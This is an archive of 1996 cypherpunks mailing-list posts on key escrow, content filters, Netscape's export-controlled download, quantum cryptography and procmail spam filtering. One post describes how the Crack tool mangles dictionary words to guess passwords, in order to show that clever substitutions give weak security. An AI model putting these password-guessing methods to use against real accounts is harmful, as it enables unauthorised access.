Message-ID: <ae113da403021004e02e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:06 PM 7/16/96, David Sternlight wrote:

>YOU and I may find it so, but you simply don't understand the mentality of
>those who will buy such filters without question. Vast numbers of people
>take the word of their minister, government, morality "guide", guru, or
>teacher without question. Why do you think Scientology has gone as far as
>it has?

Furthermore, I saw absolutely nothing "surprising" in the topics filtered
by the NetNinny and similar filters. That is, it is not surprising to me
that G-rated filters would filter all mentions of homosexuality, "safe
sex," condoms, anal sex, sex in general, etc.

There may be those who think that children need to be exposed to proper
condom use in the third grade (California's public schools think this, for
example), and those that think abortion information should not be blocked,
but there are clearly many parents who are happy to have little Johnny not
exposed to any of the above and similar topics. If this means little Johnny
is denied access to the NOW web page, or the NAMBLA safe sex page, so be
it.

If enough people want detailed explanations of what is being blocked, and
will vote with their dollars, then probably some filter vendors will choose
to make this information available. Sounds fair to me.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jul 1996 00:17:57 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Sternlight on C'punks
In-Reply-To: <199607161842.OAA03412@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199607161639.MAA00191@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> How does one set up a kill-file for a mailing list?  I run a Linux box
> with sendmail and use the MH mail system.
> 
> My best guess is that I will have to install procmail, but would like
> your advice before going to a lot of labor.

You can use procmail. If you use MH, you can also use a combination of
"pick" and "rmm" to nuke a specified list of users before going
through your mail.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 18 Jul 1996 07:13:41 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
Message-ID: <199607161705.NAA19009@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


A problem with a c'punk-style encrypted fs with source code and wide 
distribution is, of course, that attackers will KNOW that there is a 
duress key.


Rob

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 18 Jul 1996 07:44:48 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Global Government Access to Keys (GGAK)
Message-ID: <199607161705.NAA19024@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Jul 96 at 8:53, Timothy C. May wrote:
[..]
> There are some interesting "public relations" stunts we can use to
> undermine support for the concept of GAK:
> 
> * Announce in corporate press releases (for some Cypherpunkish company?)
> that "As per the laws of the Libyan Arab Jamahiriya, we have provided Col.
> Qaddaffi's Office of People's Security with our encryption keys for all
> communications passing into, out of, or over Libyan soil."

Just replace it with the French government.  They've already a 
reputation for abusing escrow.

[..]
> There are other aspects of GAK which also collide with basic values. For
> example, consider several classes of communications we consider
> "privileged":

Supposedly 'exceptions' would be made for situations such as medical 
records, etc.  What those exceptions are, and whether they are really 
more than superficial (ie, escrowed but larger keysize) exceptions is 
another question.

 > -- attorney-client discussions, in person or over phone lines.
> -- doctor-patient discussions
> -- psychiatrist--patient discussions
> -- priest--penitent confessions

What about 'journalist--informant'?

The Clinton admin will ask "Ah, but what if they forget their keys?"

This is nonsense.  It would require a standardized way to return 
record storage keys to someone, and a secure means of doing so... a 
whole other can of worms.

Many of these relationships have been compromised when the state sees 
fit anyway.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Niels Provos <provos@wserver.physnet.uni-hamburg.de>
Date: Thu, 18 Jul 1996 06:05:40 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Advances in Quantum crypto
Message-ID: <Pine.A32.3.94.960715175903.30016D-100000@wserver.physnet.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi!

AFAIK is 24 km the longest connection ever realised so far.  The group of
N. Gisin at the Univsersity of Geneva tested a quantum channel below the
Geneva lake with a length of 24 km. To be found at:
A. Mueller, H. Zbinden and N. Gisin, Nature 378, 449(1995)

A Bibliography of Quantum Cryptography can be found at
http://www.iro.umontreal.ca/~crepeau/Biblio-QC.html

I think there is something on Quantum Cryptography from Los Alamos
National Laboratory on Crypto'96 in August. They managed 7.5 km so far ? 

Greetings
 Niels Provos =8)

- - PHYSnet Rechnerverbund     PGP V2.6 Public key via finger or key server
  Niels Provos               
  Universitaet Hamburg       WWW: http://www.physnet.uni-hamburg.de/provos/   
  Jungiusstrasse 9           E-Mail: provos@wserver.physnet.uni-hamburg.de
  Germany 20355 Hamburg      Tel.:   +49 40 4123-2504     Fax: -6571 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAgUBMetz8sweILHCAJhBAQFRCgP/ZX4KomR7kOMrozj56iksT6Cej/Xmpoo7
WviBQFbE5SMwaDmm+z2qRMPdcmpGHVkB1ct7zElS25gDT38IglIQqn77F3/hHpdO
4a6+bE28Qy/rR4kSTUjCzWHYsI6Q9U8ZoHpLpZKT8i90Y9KwSvfK1yd+9eIj/q3S
g8c9XgoyRaM=
=IVfw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 18 Jul 1996 01:51:33 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: Netscape download requirements
In-Reply-To: <199607161436.JAA27358@homeport.org>
Message-ID: <31EBFAE5.217@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> 
> First off, I applaud Netscape for making the US version available for
> download.  All of my comments here should be taken as questioning the
> why's, not suggesting that the implementation is so onerous Netscape
> shouldn't have done it.  Although, you might want to add a link to a
> page decrying the kafka-esque experience; perhaps Matt's 'My life as
> an arms smuggler?'
> 
> My question is, under what lawful authority would you release the
> data?  The ITARs don't seem to contain anything special, so would you
> hand out lists on a subpeona?  Individual names on a subpeona?  Lists
> on a warrant?

  This is from our US download FAQ at
http://home.netscape.com/eng/US-Current/faq.html

	The information users provide when applying to download the 128-bit
	encryption software is used ONLY to verify eligibility. The U.S.
	government requires Netscape to maintain a log of software downloads
	should they deem it necessary under court order, to use this
information
	in their investigations of illegal use or misrepresentation of
	information. 

  If law enforcement got a court order to get the entire list, we would
fight it in court as being over broad.

> Incidentally, they seem to be doing a credit check sort of
> verification; I gave a decade old address, and it worked fine.  I feel
> free to do this because I'm legally entitled to download strong crypto
> software, and see no need to hand out my unlisted phone number in
> doing so.

  We are not doing any type of credit check.  We are doing some address
verification using local databases, so these queries don't go into
anyones tracking database.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Thu, 18 Jul 1996 03:07:28 +0800
To: snow <snow@sybase.com>
Subject: Re: Seek-and-Destroy
Message-ID: <9607162030.AA16491@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


I've thought about similar things...

I thought it would be more interesting to start feeding
it a huge list of words so that my host would show
up on just about any search..

Or, feed it an infinite string of characters.

    Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: snow, declan
From: snow @ smoke.suba.com @ smtp
Date: 07/16/96 02:26:39 PM
Subject: Re: Seek-and-Destroy

On 16 Jul 1996, Ryan Russell/SYBASE wrote:

> I tried it...
> it just seemed to threaten me for about 10 minutes, and
> then disconnected.  Couldn't see any effect.
> What was supposed to happen?

     Would it have tied up a "spider" for ten minutes? If so, then that is
probably enough. 

     Personally I'd have started dumping bogus link, or set up about 2000 
circular links to keep the damn thing busy. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Thu, 18 Jul 1996 03:15:44 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
In-Reply-To: <199607161705.NAA19009@unix.asb.com>
Message-ID: <199607162030.NAA10344@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



"Deranged Mutant" <WlkngOwl@unix.asb.com> writes:
>A problem with a c'punk-style encrypted fs with source code and wide 
>distribution is, of course, that attackers will KNOW that there is a 
>duress key.

Good point.  This suggests a design desideratum for any such system should
be that the user may choose not to have a duress key, maintaining
semi-plausible deniability for those who choose to have one.

	Jim Gillogly
	23 Afterlithe S.R. 1996, 20:29




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 18 Jul 1996 09:57:20 +0800
To: "'mrose@stsci.edu>
Subject: RE: Government: Home-Business
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960716204417Z-82133@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Mike Rose

>I'm getting more and more of this kind of crap sent to me.  I have
>a procmail script which greps a file of undesirable addresses I've
>compiled, but that hasn't proven very useful as there aren't many
>repeat offenders.  (the procmail script is available at
>http://www.universe.digex.net/~mbr/unix/junkmail.html)
>
>How are other people dealing with this?
.............................................................


For this particular one, I faxed all 6 pages back to the phone number
they gave ("send your check to.....), declining the offer.

   ..
>Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Thu, 18 Jul 1996 02:23:26 +0800
To: cypherpunks@toad.com
Subject: Re: Government: Home-Business
In-Reply-To: <199607160811.EAA00698@smtp1.interramp.com>
Message-ID: <9607161806.AA14802@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>Dear Friend,
>Thank you for your interest. Please take a minute to read this 
>important information or simply print it out.  

>All the information here is 100% accurate and can be verified
>with the Department of HUD in Washington D.C.


I'm getting more and more of this kind of crap sent to me.  I have
a procmail script which greps a file of undesirable addresses I've
compiled, but that hasn't proven very useful as there aren't many
repeat offenders.  (the procmail script is available at
http://www.universe.digex.net/~mbr/unix/junkmail.html)

How are other people dealing with this?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 18 Jul 1996 10:07:34 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EB1655.773C@netscape.com>
Message-ID: <199607161815.OAA03196@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein writes:

: Tom Weinstein wrote:
: > 
: > http://wwwus.netscape.com/eng/US-Current
: 
: It looks like the majority of download failures are caused by people
: using browsers that don't support cookies.  If you aren't sure that
: the browser you're using supports cookies, then try Netscape Navigator.
: If are using Netscape (or some other cookie-capable browser) and are
: still getting a "No Cookie" error, please let me know.

I was using Netscape navigator and got the No Cookie error, but that
was understandable since I had set the cookes file to read only.  But
making the file writable, erasing my cache, and quitting Netscape and
bringing up a new copy of Netscape did not solve the problem.  I still
got the No Cookie error.

Peter
--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 09:17:33 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Sternlight on C'punks
In-Reply-To: <v03007602ae109d824fba@[192.187.162.15]>
Message-ID: <v03007602ae11b7467db0@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM -0700 7/16/96, Vladimir Z. Nuri wrote:

>a suggestion: get a pseudonym!

In my opinion (it's not "the truth") using a pseudonym except in force
majeure circumstances such as a rape counseling group is cowardly. I think
people should stand behind what they say, and the notion of Detweiler's
having arguments with himself pseudonymously would be hilarious if it were
not pathetic.

In any case it wouldn't work for me since I suspect my literary style is
sufficiently distinctive (at least for this sort of group) that I'd be
spotted in a short time and then be the victim of a bunch of nasty "what
have you got to hide" posts.

And I'm not going to twist myself into a pretzel, stylistically speaking,
just so some thug's nastiness can be avoided. I trust the good sense of
wiser readers, and as Harry Truman said...

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 18 Jul 1996 02:49:08 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <199607161842.OAA03412@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <doug-9606161924.AA017912492@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>How does one set up a kill-file for a mailing list?  I run a Linux box
>with sendmail and use the MH mail system.
>
>My best guess is that I will have to install procmail, but would like
>your advice before going to a lot of labor.
>


procmail is a very effective and good way, and it doesn't require
a lot of effort. Just download, configure, compile, and install. It's
fairly mindless. Just follow the install instructions.


--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 18 Jul 1996 08:16:50 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <v01510102ae119c6fc06f@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


The emerging consensus is, in fact, nonexistant.

Gorelick trotted out the same fiction when she, Leahy, Sen. Kyl, and White
(deputy defense secretary) testified before the Senate permanent
subcommittee on investigations this morning.

(Note that Leahy is only occasionally a friend of the Net. His original
crypto bill had troubling additional criminal penalties; he shepharded
Digital Telephony through Congress; he is a co-sponsor of the vile
copyright bill pending right now. In sum, he'd hurt the Net more than help
it. This becomes a problem when netizens hold him up as an champion of our
freedoms -- and then when DT II comes along his fellow senators think it's
okay to vote for it 'cuz Mr. Net, Leahy, is a cosponsor.)

My rebuttal to Gorelick's fantasy is: well, what about Japan, where the
country's constitution forbids wiretapping?

-Declan




Michael writes:

>On Sun, 14 Jul 1996, Timothy C. May wrote:
>
>> So, who is in this "emerging consensus"?
>>
>Foreign governments?
>(Process of elimination, not inside info...)
>
>
>
>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law |
>U. Miami School of Law     | froomkin@law.miami.edu
>P.O. Box 248087            | http://www.law.miami.edu/~froomkin
>Coral Gables, FL 33124 USA | It's hot here.  And humid.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 18 Jul 1996 07:42:51 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Sternlight on C'punks
In-Reply-To: <v03007602ae109d824fba@[192.187.162.15]>
Message-ID: <199607161842.OAA03412@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



How does one set up a kill-file for a mailing list?  I run a Linux box
with sendmail and use the MH mail system.

My best guess is that I will have to install procmail, but would like
your advice before going to a lot of labor.

I supose that it would be easier just to unsubscribe from cypherpunks,
but that would be rather self-defeating.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 18 Jul 1996 02:37:19 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Surf-filter lists
Message-ID: <v01510103ae11a1bfffcd@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


>Vlad: How can consumers make an informed decision as to which filter
>they wish to purchase, if they are not told exactly what information
>each product is filtering out?
>
>Meeks et al may be guilty of flamboyant, emotionalistic prose, but I
>find the concept that the public is expected to buy various filters
>without knowing what they filter...frankly, ridiculous.


Flamboyant prose? Moi? Never!

More to the point, as I wrote at the end of the original CWD, it's a
bait-and-switch maneuver. Go after porn, they say, but the censor political
information.

And you don't know about it.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 18 Jul 1996 12:29:06 +0800
To: David Sternlight <cypherpunks@toad.com>
Subject: Re: CookieScan 0.0 rev 0
Message-ID: <2.2.32.19960716215409.00d2a4bc@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 AM 7/16/96 -0700, David Sternlight wrote:
>At 5:34 PM -0700 7/15/96, Christopher Hull wrote:
>>Do y'all think there might be an interest in a
>>utility which would allow the user to deal with
>>browser cookies?
>>
>>What I imagine is a little utility that would
>>display the cookies stashed on a machine and
>>give the user the option to either delete or
>><snicker> edit </snicker> any given cookie.
>>(Hey, it's *your* computer, not the website's).
>
>And they'll simply <snicker> start encrypting the cookies if they don't do
>so already. Have a nice day.
>
>David
>
>
>
we have already <snicker>:-)</snicker>

John Pettitt, jpp@software.net
EVP, CyberSource Corporation, 415 473 3065

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 18 Jul 1996 11:49:44 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Netscape download requirements
In-Reply-To: <199607160905.FAA26831@mailserver1.tiac.net>
Message-ID: <199607161908.PAA05069@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Julian Burke" writes:

: 
: Jeff Weinstein wrote:
: 
: >  We received written permission from the State Department for our
: >download verification mechanism.
: 
: What exactly is the reason for Netscape asking for the name, address, 
: e-mail address, and telephone number of anyone who wishes to download 
: the US-browser? If I remember correctly MIT in distributing PGP only 
: asks that you affirmatively assent to obeying export laws (and the 
: terms of the rsa license).
: 
: I have not heard at any point that the MIT system does not meet the 
: legal requirements of ITAR. Is there perhaps some other reason 
: Netscape wishes to have this information? 

When I asked the agent of the NSA who is seconded to the Office of
Defense Trade Controls to answer questions about the application of
the ITAR to the cryptographic software what the authority for the MIT
system was, she denied that the MIT system had been approved (or
disapproved) by the Office of Defense Trade Controls, although I
gather that the people at MIT may have spoken informally with someone.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 12:25:01 +0800
To: Duncan Frissell <tomw@netscape.com (Tom Weinstein)
Subject: Re: US versions of Netscape now available
In-Reply-To: <2.2.32.19960716103638.00835c08@panix.com>
Message-ID: <v03007605ae11ca8d04d9@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:36 AM -0700 7/16/96, Duncan Frissell wrote:
>At 04:18 PM 7/15/96 -0700, sameer wrote:
>
>>	Not like that's tough to figure out. Congrats. It's cool to
>>actually be able to connect to my webserver using real encryption.
>>Glad the lawyers don't think Barksdale is going to jail anymore.
>
>I'm glad too.  So how many minutes did it take to leak overseas?

It doesn't "leak overseas" as if there were some regrettable lapse in the
plumbing. Someone has to commit a felony violation of Federal law.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 18 Jul 1996 09:38:34 +0800
To: cypherpunks@toad.com
Subject: C'punks T-shirt idea?
Message-ID: <Pine.SUN.3.91.960716155050.9726B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Currently reading John Keane's biography of Tom Paine,]

Picture of Paine with superimposed text 
	Atlanticus [crossed out]
	Forrester  [crossed out]
	Common Sense [crossed out]
	Common.Sense@alpha.c2.org

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 18 Jul 1996 10:35:07 +0800
To: Jean-Francois Avon <deviant@pooh-corner.com>
Subject: [flaming] Why <jf_avon@citenet.net> was blocked.
Message-ID: <9607162041.AB22437@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 16 Jul 96 at 19:43, The Deviant wrote:

> Umm.. when telling other ppl that they do not know how to read, it
> might be usefull to use sentances with a subject AND a predicate.  I
> know that this is something they taught you _way_ back in second
> grade, but you should still remember it.

Sorry to say, but I did not get english classes up until grade 4 and
since I had no occasions to practice it before age 18, I don't
remember anything of my english classes.  A major brain trauma
probably helped too.  Although I write french much better than most of
the university educated francophone population here, I don't even
remember any french grammar.

As for the word 'predicate', would you please deign tell me what it
means?  I don't have an english dictionnary handy.

As for my true question regarding realdeal.exe /per used on top of
SecureDrive 1.4a, do you have any comments?

JFA

The brave dies only once, the coward (who uses anon remailer for
flaming) dies a thousand death.  -old adapted arab proverb.

- -- 
DePompadour, Societe d'Importation Ltee
    Limoges porcelain, silverware and crystal
JFA Technologies
    R&D consultants: physicists technologists and engineers.
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: PGP Public key: http://w3.citenet.net/users/jf_avon

iQEVAgUBMeuTHciycyXFit0NAQHY5AgAiki+95PrT1VO6FEJrCG1tYjvg5/I6OoL
9cFIvVIsKJiN7AjVE029Y/Sc5xEsTQSCg3yAxfEWWRy054IZYdO098znKDYoeh/9
3Fs+xKjLN1L7m3XiQH8AAL0GMWZz31ft95eKcnb7wermwzHXAhVbW3BoSwYWBYD2
o584rm7ahrriWA4Z+nnPB60w/OY5SYZl95aeGQbudJG0fRklvBjh1j5GVRudSinb
I2InlbrH5QbVpKlaJ1FpJt//X39CJnOCMx4iK8QwjMLekJAtyHZGZxafuUz6T2+r
RpL3slRCygt6vCJeSJAwlE+LVaM8I1rRUIk3GCdIIxX5FTLyMpr2pw==
=bw9v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 18 Jul 1996 12:28:46 +0800
To: perry@piermont.com
Subject: Re: Netscape download requirements
In-Reply-To: <199607161346.JAA07227@jekyll.piermont.com>
Message-ID: <31EC2879.4E15@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Jeff Weinstein writes:
> >   If you are not comfortable providing this information, then you
> > may either run the export version, or purchase the retail navigator
> > package, which also includes the US only version when sold in the US.
> 
> But you can't buy the Linux or other similar versions, so this is not
> an option for many of us.

  You can buy a supported version of Navigator for Linux from
Caldera.  I've been told that we have given them a US binary, but I'm
not sure if they are shipping it yet.  You should contact them
to find out when it will be available.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Thu, 18 Jul 1996 12:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <2.2.32.19960716220138.00341fec@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 7/15/96 -0700, David Sternlight wrote:
>At 12:45 AM -0700 7/15/96, Bill Stewart wrote:
>>At 09:43 PM 7/8/96 -0700, ??? wrote:
>>>If the purpose is for use with "Crack" or some similar program, it might be
>>>better than you would think.  You won't get the "unusual" words, but you
>>>will also get the words in common usage that do not appear in dictionaries.
>>>(Such as fnord, jedi, killfile, and the like...)
>>
>>"fnord" is in _my_ dictionary - can't you find it in yours?  :-)
>>
>>>Another thing to look for when choosing dictionaries/wordlists for crack is
>>>not sticking to english.  If you have a userbase that is known to have a
>>>certain percentage of people of a non-english background, you will want to
>>>find lists of words from that background.  (I had a sysadmin asking me about
>>>Yiddish and Hebrew wordlists for just that reason.)  These can be a bit
>>>harder.  (Especially for unusual languages.)
>>
>>Grady Ward has his Moby Words databases with some of this kind of information.
>>In addition to the usual sets of languages, it's useful to include any
>>available lexicons of Elvish, Klingon, Unix, and other popular
>>hacker-languages,
>
>It is pretty easy to defend against dictionary attacks by using an expanded
>character set--mixed caps and lower case; numbers substituted for some
>letters according to easily-remembered personal rules.

Then I caution you to review the program 'Crack'.  Crack comes with two sets
of  rules with which it mutates the words from two separate dictionaries.
Things like:  replace 'i' with 'y', 's' with '$', 'e' with '3', change
capitalization to pattern AbCdE, etc.  Typically, there is an extensive set
of rules (I remember 47) that perform more "morphing" of a shorter "hot"
dictionary list, followed by a common subset of the rules applied to the
entire dictionary.  The shorter dictionary list I remember seeing contained
an extensive list of female first names, common computer "words" such as
foo, bar, etc., and even some Klingon and Elvish words.  These words were
subjected to extensive letter shifting, case changing, and substitutions.
The balance of the dictionary was subjected to the simpler subset of rules
(22, I believe) regarding substitution, reversal of letters, capitalizing
the first and/or last letters, suffixing a single non-alpha character, etc.

I know a rather paranoid sa who used to think he had secure passwords
because he'd look around for some "word" of some random object nearby, then
transmogrify some letter (typically substituting 'y' for 'i').  Crack found
him out in very short order.

The reason I post this is that these word lists are invaluable to the Crack
operator.  *ANY* knowledge that reduces the search space can render the
security useless.  For example, if a Crack operator learns that you once had
a password of "any0ne", he or she will make sure to include a rule
substituting zero for 'o' in both dictionaries, they will probably make an
effort to emphasize letter-to-number substitutions of the words in their
dictionary, and maybe even focus less (or at least test last) on other
attacks, such as case-changing or number-suffixing.  Those
"easily-remembered personal rules" to which you refer can catch you pretty
quickly.

>"Da5id" in "Snow Crash" by Neal Stephenson is an obvious example, since the
>"v" is a roman numeral 5. Another is the "Compuserve method" of inserting
>punctuation characters between words making up a password or key. Since the
>length of the words used is unknown to the cracker, this makes his job
>harder.

Harder is not NP-hard.  It's a very very long way away from NP-hard.

>That is--a dictionary which accomodates such things as the above will be
>pretty large. With the number rule, there would have to be 10 additional
>versions of the one-letter word, 10 versions of each leading character
>making up a two letter word, and then it starts increasing combinatorially.
>Might as well use brute force.

A "pretty large" dictionary is still much! smaller than brute force.  And
even if it is the precursor to brute-force, it's still a better starting
point than 
0x00000000000000, if you have reason to believe that it's based on an ASCII
password.

Just remember the old joke:  entropy ain't what it used to be.  And every
generation of faster processor that arrives makes this statement more
relevant to cryptanalysis.

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 18 Jul 1996 12:24:08 +0800
To: mrose@stsci.edu
Subject: Re: Government: Home-Business
Message-ID: <9607170008.AA17243@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Rose <mrose@stsci.edu> writes:
>>Dear Friend,
>>Thank you for your interest. Please take a minute to read this
>>important information or simply print it out.
>
>I'm getting more and more of this kind of crap sent to me.
>[...]
>How are other people dealing with this?

Since you say you have procmail, you could try something along this
(as yet untested) line:

:2HB
cypherpunks@toad.com
^dear friend
/dev/null

I find that people who address me as "Dear Friend" are invariably
pushing some kind of chain letter, religion, multi-level marketing scam,
or the like.  My real friends _know_ my name.

--
Martin Janzen           janzen@idacom.hp.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Jul 1996 11:24:27 +0800
To: "Clay Olbon II" <cypherpunks@toad.com>
Subject: Re: Symantec's Your Eyes Only
Message-ID: <199607170018.RAA04554@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


